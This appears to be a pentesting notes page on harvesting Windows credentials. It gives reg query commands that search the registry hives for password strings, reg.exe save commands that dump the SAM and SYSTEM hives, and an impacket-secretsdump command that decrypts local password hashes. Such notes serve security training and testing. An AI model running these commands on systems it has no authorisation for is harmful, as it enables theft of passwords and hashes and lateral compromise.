Registry Hives
We can utilize the Windows registry to harvest information. The following command examples can be used to query the registry for the password keyword:
reg query HKLM /f <search_pattern> /t REG_SZ /s
reg query HKCU /f <search_pattern> /t REG_SZ /s
reg query HKU /f <search_pattern> /t REG_SZ /sa. HKM, HKU: These values refers to the keyname option which must be specified
HKLM: HKEY_LOCAL_MACHINE key which contains configuration information particular to the computer (for any user)HKCU: HKEY_CURRENT_USER which Contains the root of the configuration information for the user who is currently logged on. The user's folders, screen colors, and Control Panel settings are stored here. This information is associated with the user's profile.HKU: HKEY_USERS key which contains all the actively loaded user profiles on the computer
Since we did not specify a remote machine (
\\<computername>\), the operation will default to the local computer
b. /f : Specifies the data or pattern to search for
c. /t : Specifies registry types to search. Valid types are: REG_SZ, REG_MULTI_SZ, etc.
In this case, we specify it as REG_SZ, which is simply a fixed-length text string
d. /s : Specifies to query all subkeys and value names recursively
Example
The Windows registry may store a copy of some of the SAM database contents to be used by Windows services. We can use the reg.exe tool to save the values from the registry. The following command can be used to extract the files required to decrypt the SAM database's content, namely the HKLM\SAM and HKLM\SYSTEM registries:
C:\> reg.exe save HKLM\SAM C:\users\Administrator\Desktop\sam-reg
C:\> reg.exe save HKLM\system C:\users\Administrator\Desktop\system-regWe can now use the Impacket secretsdump.py script to decrypt the SAM database content:
$ impacket-secretsdump -sam <SAM_file_location> -system <system_file_location> LOCAL-sam: SAM hive to parse-system: SYSTEM hive to parseLOCAL: To parse local files
Last updated